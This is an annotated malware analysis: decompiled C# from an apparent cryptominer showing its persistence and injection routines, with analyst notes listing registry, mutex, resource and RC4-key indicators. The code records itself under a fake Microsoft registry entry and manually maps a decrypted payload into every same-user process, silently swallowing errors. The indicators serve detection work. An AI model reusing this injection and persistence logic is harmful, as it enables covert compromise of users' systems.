// Token: 0x060000C3 RID: 195 RVA: 0x0000BBBC File Offset: 0x00009DBC
/// <summary>
/// Decompiled persistence entry point: records the path of the running executable in the
/// registry, then walks every process on the host and calls <c>DllPersistence</c> for each
/// one owned by the current user. Does nothing when <c>InjectionIsRunning()</c> reports
/// that the marker mutex already exists.
/// </summary>
/// <remarks>
/// Analyst notes (host indicators visible in this method):
/// - Settings write with app "Microsoft", section "Sysinternals", key "9481", value = own executable path.
///   Assuming <c>Interaction</c> is Microsoft.VisualBasic.Interaction, SaveSetting stores this under
///   HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals, value name 9481.
/// - Both catch blocks are empty, so no failure here surfaces as an error or crash.
/// </remarks>
public static void LoadPersitenceEngine()
{
    try
    {
        // Only proceed when the marker mutex is absent (see InjectionIsRunning).
        if (!Injection.InjectionIsRunning())
        {
            // Stores the sample's own path; app/section names look chosen to resemble a
            // legitimate vendor entry - NOTE(review): intent inferred from the names only.
            Interaction.SaveSetting("Microsoft", "Sysinternals", "9481", Application.ExecutablePath);
            Process[] processes = Process.GetProcesses();
            int num = processes.Length - 1;
            for (int i = 0; i <= num; i++)
            {
                Process process = processes[i];
                try
                {
                    // Decompiler residue: the result is discarded and this is not a valid C#
                    // statement as written. Its only visible effect is reading MainModule,
                    // which can throw and so skip the process via the catch below.
                    Path.GetFullPath(process.MainModule.FileName) + process.Id.ToString();
                    // TextCompare=false: presumably the VB Operators.CompareString binary
                    // (case-sensitive) comparison of the process owner with the logged-on user.
                    if (Operators.CompareString(Injection.GetCurrentProcessOwner(process.Handle), Environment.UserName, false) == 0)
                    {
                        // Same-user process: hand its PID to the injection routine.
                        Injection.DllPersistence(process.Id);
                    }
                }
                catch (Exception ex)
                {
                    // Swallowed: any exception from MainModule, Handle or the owner lookup
                    // just skips this process.
                }
            }
        }
    }
    catch (Exception ex2)
    {
        // Swallowed: the whole routine fails silently.
    }
}
// Token: 0x060000C1 RID: 193 RVA: 0x0000BAFC File Offset: 0x00009CFC
/// <summary>
/// Returns the account name that owns the process behind <paramref name="processHandle"/>,
/// with any "DOMAIN\" prefix removed.
/// </summary>
/// <param name="processHandle">Handle of the process whose access token is queried.</param>
/// <returns>
/// The part of <c>WindowsIdentity.Name</c> after the first backslash; the whole name when
/// it contains no backslash (IndexOf returns -1, so the substring starts at 0).
/// </returns>
/// <exception cref="Exception">Any failure is caught and rethrown to the caller.</exception>
public static string GetCurrentProcessOwner(IntPtr processHandle)
{
    IntPtr zero = IntPtr.Zero;
    string result;
    try
    {
        // Return value is ignored; on failure `zero` presumably stays IntPtr.Zero and the
        // WindowsIdentity constructor below is what throws - TODO confirm against the
        // OpenProcessToken declaration, which is outside this listing.
        Injection.OpenProcessToken(processHandle, Injection.TOKEN_QUERY, ref zero);
        WindowsIdentity windowsIdentity = new WindowsIdentity(zero);
        // Strip everything up to and including the first backslash (domain or machine name).
        result = windowsIdentity.Name.Substring(windowsIdentity.Name.IndexOf("\\") + 1);
    }
    catch (Exception ex)
    {
        // Rethrown via `throw ex2`, which resets the stack trace; the only caller in this
        // listing (LoadPersitenceEngine) swallows it anyway.
        Exception ex2 = ex;
        throw ex2;
    }
    finally
    {
        // Release the token handle if one was obtained.
        if (zero != IntPtr.Zero)
        {
            Injection.CloseHandle(zero);
        }
    }
    return(result);
}
// Token: 0x060000C2 RID: 194 RVA: 0x0000BB84 File Offset: 0x00009D84
/// <summary>
/// Reports whether a named mutex "83729184726481" can be opened, which the rest of this
/// listing treats as "the injected component is already active".
/// </summary>
/// <returns><c>true</c> when OpenMutex returned a non-zero handle; otherwise <c>false</c>.</returns>
/// <remarks>
/// Analyst notes: the mutex name is a host indicator usable for hunting open handles.
/// The code that creates the mutex is not part of this listing.
/// </remarks>
public static bool InjectionIsRunning()
{
    // 2031617u == 0x1F0001, the Win32 MUTEX_ALL_ACCESS mask; second argument is bInheritHandle
    // (assuming Injection.OpenMutex maps to the Win32 OpenMutex API - declaration not shown).
    IntPtr intPtr = Injection.OpenMutex(2031617u, false, "83729184726481");
    // Closed unconditionally, even when the open failed and intPtr is zero; only the
    // pointer value is used afterwards, not the handle.
    Injection.CloseHandle(intPtr);
    return(!(intPtr == IntPtr.Zero));
}
// Token: 0x060000C0 RID: 192 RVA: 0x0000BA80 File Offset: 0x00009C80
/// <summary>
/// Decrypts an embedded resource and passes it, wrapped as a <c>PortableExecutable</c>, to
/// <c>InjectionMethod.Inject</c> for the process identified by <paramref name="Pid"/>.
/// Skipped when <c>InjectionIsRunning()</c> reports the marker mutex already exists.
/// </summary>
/// <param name="Pid">Process id of the target process.</param>
/// <remarks>
/// Analyst notes (static indicators visible in this method):
/// - Embedded resource name <c>_2342342353245</c>.
/// - Decryption via <c>Miner.Proper_RC4</c> with the UTF-8 bytes of "sickmyduck" as key, so the
///   embedded payload can be recovered offline for analysis (assuming the helper is standard
///   RC4, as its name suggests - implementation not shown).
/// - <c>InjectionMethodType.ManualMap</c>: the enum name suggests loading without the OS loader,
///   in which case the module may not appear in the target's loaded-module list - TODO confirm
///   against the InjectionMethod implementation.
/// </remarks>
public static void DllPersistence(int Pid)
{
    // Re-checks the marker mutex; LoadPersitenceEngine checks once before its loop, so this
    // is what stops further attempts once the mutex appears mid-enumeration.
    if (!Injection.InjectionIsRunning())
    {
        InjectionMethod injectionMethod = InjectionMethod.Create(InjectionMethodType.ManualMap);
        IntPtr value = IntPtr.Zero;
        // The decrypted image is held only for the duration of the Inject call, then disposed.
        using (PortableExecutable portableExecutable = new PortableExecutable(Miner.Proper_RC4(Resources._2342342353245, Encoding.UTF8.GetBytes("sickmyduck"))))
        {
            value = injectionMethod.Inject(portableExecutable, Pid);
        }
        // A zero result is treated as failure; the error is fetched and discarded, so
        // nothing is logged or reported.
        if (!(value != IntPtr.Zero))
        {
            injectionMethod.GetLastError();
        }
    }
}